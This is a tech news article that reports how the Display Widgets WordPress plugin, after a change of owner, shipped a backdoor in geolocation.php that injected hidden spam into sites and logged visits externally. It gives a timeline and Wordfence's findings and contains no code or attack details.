Malicious WordPress plugin installed backdoor on thousands of websites

Widget plugin spewed spam to unsuspecting victims

Hackers have used a WordPress plugin to install backdoors on up to 200,000 websites, allowng spam to be uploaded onto unsuspecting websites. 

According to research carried out by IT security firm WordFence, the plugin, known as Display Widgets, should be removed immediately by website owners. The firm said that the last three releases of the plugin have contained code that allows the author to publish any content on an affected site.

Advertisement - Article continues below

"The authors of this plugin have been using the backdoor to publish spam content to sites running their plugin. During the past three months the plugin has been removed and readmitted to the WordPress.org plugin repository a total of four times," said Mark Maunder, CEO of WordFence. 

Maunder said that the plugin was originally developed by its original author as an open-source plugin but was then sold to others on 21 June. An updated version, 2.6.0 was released by its new owner immediately. WordFence was informed by David Law, a UK based SEO consultant, that the widget had begin installing additional code and then started downloading data from Law's on server.

On 23 June, WordFence removed Display Widget, and a week later, the new owner released version 2.6.1 of the plugin. This release contained a file called geolocation.php which, no one realised at the time, contained malicious code. This code allowed the plugin author to post new content to any website running the plugin, to a URL of their choosing. 

Advertisement
Advertisement - Article continues below
Advertisement - Article continues below

"Furthermore, the malicious code prevented any logged-in user from seeing the content. In other words, site owners would not see the malicious content. David Law again contacted the plugin team and let them know that the plugin is logging visits to each website to an external server, which has privacy implications," said Maunder.

On 1 July, the plugin was pulled from the WordPress repository, but then followed by version 2.6.2 on 6 July. Again, included the malicious code referenced above which had still gone unnoticed by anyone. 

It was on 23 July when a user, by the name of Calvin Ngan opened a Trac ticket reporting that Display Widgets was injecting spammy content into his website. He included a link to Google results that had indexed the spam and said the malicious code is in geolocation.php.

In September, version 2.6.3 of the plugin was released and it included the same malicious code. Last week, a forum user on WordPress.org reported that spam has been injected into their website on the Display Widgets plugin support forum. 

Advertisement - Article continues below

"The authors of the plugin are actively maintaining their malicious code, switching between sources for spam and working to obfuscate (hide) the domain they are fetching spam from," said Maunder.

The widget was removed permanentely on 8 September, but Maunder tracked down the plugin's new buyer to a service called WP Devs, which buys old and abandoned plugins.

His investigations found that the company appears to be run by one person in the US and possibly another in Eastern Europe, judging by linguistic errors made by the poster.

Maunder said that people in the WordPress community should not "start any witch hunts". 

"Occasionally plugins change ownership and very rarely, that doesn't go well. That appears to be what happened in this case," he said.

Featured Resources

Preparing for long-term remote working after COVID-19

Learn how to safely and securely enable your remote workforce

Download now

Cloud vs on-premise storage: What’s right for you?

Key considerations driving document storage decisions for businesses

Download now

Staying ahead of the game in the world of data

Create successful marketing campaigns by understanding your customers better

Download now

Transforming productivity

Solutions that facilitate work at full speed

Download now
Advertisement

Recommended

Visit/security/ransomware/356292/university-of-california-gets-fleeced-by-hackers-for-114-million
ransomware

University of California gets fleeced by hackers for $1.14 million

30 Jun 2020
Visit/security/cyber-security/356289/australia-announces-135b-investment-in-cybersecurity
cyber security

Australia announces $1.35 billion investment in cyber security

30 Jun 2020
Visit/cloud/cloud-security/356288/csa-and-issa-form-cybersecurity-partnership
cloud security

CSA and ISSA form cyber security partnership

30 Jun 2020
Visit/business/policy-legislation/356215/senators-propose-a-bill-aimed-at-ending-warrant-proof-encryption
Policy & legislation

Senators propose a bill aimed at ending warrant-proof encryption

24 Jun 2020

Most Popular

Visit/mobile/google-android/356373/over-2-dozen-additional-android-apps-found-stealing-user-data
Google Android

Over two dozen Android apps found stealing user data

7 Jul 2020
Visit/laptops/29190/how-to-find-ram-speed-size-and-type
Laptops

How to find RAM speed, size and type

24 Jun 2020
Visit/cloud/356260/the-road-to-recovery
Sponsored

The road to recovery

30 Jun 2020